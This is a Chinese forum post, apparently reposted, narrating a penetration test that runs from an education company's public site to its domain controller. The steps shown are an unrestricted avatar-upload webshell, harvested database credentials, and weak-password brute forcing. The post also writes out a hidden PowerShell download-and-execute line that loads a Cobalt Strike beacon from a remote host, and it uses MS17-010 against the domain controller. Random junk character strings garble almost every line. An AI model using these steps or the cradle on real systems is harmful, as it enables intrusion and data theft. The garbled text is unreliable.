找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2354|回复: 0

渗透实战 | 从外网直接打到内网全过程

[复制链接]
发表于 2024-3-1 19:41:32 | 显示全部楼层 |阅读模式

4 f7 B% D! w7 C7 D8 a 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 0 A& j3 Y3 E4 L

4 r. _% _# I! H5 A

% X# g0 t8 d7 U! |( N/ M   m! d( B: @+ U3 `; h8 `

) c t$ \! U# A5 Y }/ E

% l) G2 ^6 C5 k- b/ r1 @ 正文 : E; v) b) z, E$ S2 t' ^& S

3 }! r8 \) Y" y' I0 O) w# u/ E p5 i

, [ n. F0 v) P. h, o/ w  ; r8 z4 K( \. j4 O

6 \: @2 X; q+ s+ `# c

# l% \* C- V4 N! ^2 t) b% _. a 目标:www.xxxx.com(一家教育机构)
4 y' M" C- c I# g
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
+ |) B/ S1 S& b @$ f: N

2 H' Z( C7 P' R( _1 [

7 T6 @5 h R- M! V4 V6 K# W vshapes= - p: R" F$ m7 G/ F% m% X/ T

. J! O" N) c3 S0 X

2 K2 H, a5 \* } D 进行了简单的信息搜集
! ^% a/ ^2 G2 V2 f0 q
' T) H6 r6 E) R1 x( z+ q
2 N9 r* u- w& m" }& M

9 s7 }. Z7 c$ m6 @7 M

3 T4 l0 w4 s) ]- P2 ~ 子域名搜集/ `5 h2 d+ I1 J* h

9 O" f% a2 A9 m2 _( A: _

, c) ?- h. d" {7 W vshapes= % u9 v4 ]5 X. x0 Z4 k( b

7 P Z( H6 C+ C& Y

4 i3 s* o$ {+ I9 h" ^ fofa找资产
. N6 a9 S; s! F& W! _
9 c* ]( S: j( A. E. \
9 b4 T) @. ]* e' n5 W0 b5 B

* z/ J; D7 X6 B- Y

: y3 j' k& {/ x) n& | vshapes=; M1 |7 i3 L4 L( k& E" v$ y

: B5 K( H* s/ ?% d* @

$ V- }" `+ j: U8 G { 一共七个资产。去重之后只有两个。
! g/ `+ V2 d( ~. f t
% |/ i# d u- e+ Q E: \# n( t
( o4 c7 H. N2 K8 ^% @" \/ E

+ ~! z) h+ t# B1 |3 [5 P$ e

9 l5 R* }/ E* \) H) ~) @) o 目录探测 ' l2 @( R" m6 E7 ~6 a

# q3 P- o. N+ y1 t; {' G

j) P; G2 H- x, c+ }; [9 I vshapes=. a: Y+ s3 L( l: G

b) T& h& J7 f% ?# {6 }2 O4 |

7 P) D2 l/ }- h5 D# \9 b; b. y& x* b 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
6 @. {! |. F! a
$ K0 `3 Q1 ^* e. q" L; f& x. t
$ R& L2 `6 s1 `; ^) b* y0 j

5 U/ L4 X ^2 k; W% c0 T9 e- ~$ ^

! G! u/ Y9 q2 |) r 我又尝试了通过修改返回包来绕过登录界面+ n4 k: v+ Y( h/ U1 g/ y) w% [6 ?

1 _; X% L3 K- \" l2 p

8 I) @+ N2 L5 ~ ~; Z! H vshapes= 0 `8 C9 _, `, u! \ K& W1 L

6 h; f1 i$ @/ V! d! h

* p( o9 Y! j( E: `& }3 r% y% i 还是不行,尝试注入无果 ! k/ o) a2 u* {

5 j0 Y/ [4 m' A7 j1 _( q0 i# f

# P( J& j' K' R) O, m {. p( j# ` vshapes= 8 G7 K7 y9 V1 d6 M0 x9 _" W% y

& n3 h7 t4 V! I _" D# Z

. D3 K7 `! \, B9 F S- D 不过我目录探测出了一处Spring信息泄露
, @! v; G: @# O w8 w3 S
8 _4 X8 \3 w& }4 \" F+ u
2 E+ {: A5 L3 [* v

, x& y: `, V6 ?+ ^/ |# B9 q& p

2 f9 C {0 s" f" M. b vshapes= G. C+ d+ c) E m

- h) W L6 z8 V6 s: L% ?; \

, ~0 P5 }+ W$ W7 w4 t! m 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录, f& \ z( Y( n/ r1 H

# S; F) y3 T" E2 m9 Q/ I% Z: U C

0 l" Z% B6 _& o! {9 l' L- M vshapes=9 i+ ^( x9 T& X! T

! E: w6 O& c( p4 ?9 q# ?# `6 U1 M2 {

k* S y, D% f: `# y 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。2 Y" P) F$ T" K& p; b* {2 d

5 w& Z: X' L# X! M) e( c

; J( Y$ }% g" L2 I vshapes= & e0 C7 |& N7 J% ]- y

; a! `9 ^& N/ \1 D

: ]3 k; X. g& f 获取有些师傅到这一步就手机抓包电脑测了。 " {8 k/ M7 Y8 z; s2 ^

: B' ?. B5 o; Y9 N! D

4 O: Y8 K6 ~: P7 I Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 2 K* b, {' k3 b1 ~

+ y" d2 i& x, h. d: e7 u

; S3 I0 g/ j" q: G$ K* G# k 其中在一个公众号发现了小程序,可以进行注册。5 C# S M- k: [' P3 u. o

* J( ^8 g3 _7 [$ T

6 b a2 w0 Q2 b- ?- P) F 看到了头像上传,尝试上传获取WebShell 9 R. y2 W% v* [' f& t# l: a

8 [% h1 |( a- d3 b

4 t7 A5 d2 `6 a6 i vshapes= 2 g! f; v7 v6 o/ u% }

: @, z: z1 @/ d5 v7 _7 m% {: \

( ~9 Y/ Z: q+ O 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问: ]) \% M' m1 X! `+ {

; E$ R2 @9 k d: m

: _( R& T8 K# V% w7 ~3 p; b vshapes=5 x" Q9 ]* [$ F5 E

3 V4 S2 P" |6 a0 B! X" X& G

0 z, y8 z1 a9 @8 G 然后上了大马 7 q E% u E4 p1 n: E& I$ @- k$ x

9 M. ?+ b9 m: O' I) b* `0 i- l

% x% S# X# k* m: j$ }' P X vshapes= 8 [7 S% v( T6 q# u+ o2 T. z

8 y' ]" A2 O7 c% K

+ ~& q6 | @4 P- C: H vshapes= # e& S# n3 j6 T& |9 Z0 }, H/ G

U4 _+ |' V$ }/ f

' F) s( E" w$ U8 n6 v5 r' N+ {7 H 通过翻找文件发现数据库账号密码 # L! z7 v+ s: t [2 b9 g1 {

& V: u7 Y l8 I9 v& v: @- W4 E) ^/ E

0 e5 }) A5 t/ `1 h! P4 e$ a3 h vshapes= t; V( N _; @, s! B+ z+ w; @

5 U+ L) `3 e5 w( ]4 x3 e

7 c# T1 y$ r& q) \2 A3 v' W --内网渗透 , ~& v. v" F: d9 j9 l

" D( K. Z- e$ H: |! H) g6 H4 b

4 f4 I, ^/ Z Y6 @1 \4 v8 ^; ] 直接通过powershell执行 cs上线 8 N+ J# ~) l [3 v

8 f$ M. f" c: D2 W' i7 r; d5 E# c- C

/ w. \# W1 F% ?7 u powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"2 T* V0 v6 f9 _; a

/ z, V6 p8 t H" @% h6 T( d

$ y3 b2 l9 E$ X" d; D3 R vshapes=. I' I! o, x! C+ z

$ w5 m; ]- n! y4 h

; y( B/ z: E) c0 t3 U2 l 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破* @0 H/ m; h" Y4 `7 ?: |6 ^4 C

0 T7 I# d& Y$ R7 ^/ F# @

4 ]8 I2 g' Q; S6 n3 c: \ vshapes= 7 Y! Z0 p- @' }9 f A/ }6 m

; m! T( a$ \$ l9 u$ u; U* o* m

' N/ f- L) I4 i8 R! ?0 k 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
5 J6 ~6 B: ~. L/ v
( m; n8 ?, J2 z* t! H# S
Z+ i- n. F$ A: f$ |
' Z5 Z/ E! o2 K9 b3 a0 U: v2 O

& m9 O U6 o3 M) T$ ]

, m, `" H6 v3 A8 @ Q9 B vshapes= ( ~7 w; K. h- o2 K, N

/ @+ q9 a7 T# i3 r5 g

' s0 T7 b* g( J1 Q 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ [0 x) {( Y# Q& f. o5 V
9 p' ~8 ]) Y1 e$ x9 d
/ L* C$ ^4 o1 n2 ~8 Y. y

+ v3 T4 z+ @7 s+ {9 m/ n8 D7 Y

- m- ^! p0 B7 Y: n vshapes= 6 n( j: p+ K) Q: {

# P' Q2 c0 J# L8 J6 V5 `6 Z

- C: J5 j# u3 Y4 u; U3 r9 C
$ V: h, d. d+ |8 R, a% X. v: I& I
" t3 E5 \# x, U J0 g3 F
1 c- [) N7 H# p6 Z8 U7 o

( @8 {4 W' b& m; X& f0 b

! R0 t. K2 ?9 @: W/ q' r# F( O   ; [! C4 X( t6 W9 t& [! f% Q

4 X) b+ h; T( g% w

5 O. W+ r. ^' J8 n 小结; D& C T& V: s u8 w: b) f9 D6 F

) O/ l0 z! U7 E" x, p, N* \1 e; o

3 j) v$ e/ i. j; E: q }   - g- _7 y! m( r: E" @. l6 j

" { Q. M) P r+ Q( h. Q! p

' p: ]# u) G" [5 r: Q 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!7 j1 x, N: U1 L& a* y+ A! j% v

( g0 y+ ^* w1 n! _0 [/ X" }

! y& j$ i( U, p3 ?  2 t7 s0 a. l! E; W

) q- X+ {1 g3 U8 \: r8 g
    # \0 s, m& M$ w# B3 c
  • - {) l/ Q3 R( ^6 I  7 f+ U+ z" f4 [/ y# r
  • ; S* e% q& c5 u$ d- h7 u
  • " \ L) Z8 G3 V" K   _ y V0 H6 _9 c! f( z* d' w# ~
  • 6 q& z2 g* e5 E3 @
5 G7 O3 L/ u& U7 p5 A i# V1 A

9 }6 A: z9 N+ _' G1 Z 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html( U7 w% k7 p& S

7 C* ~" M- D9 g2 n+ y& d

2 {% e% o" U* s" p( S H   ! m, Q% i/ u: U( t7 R

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表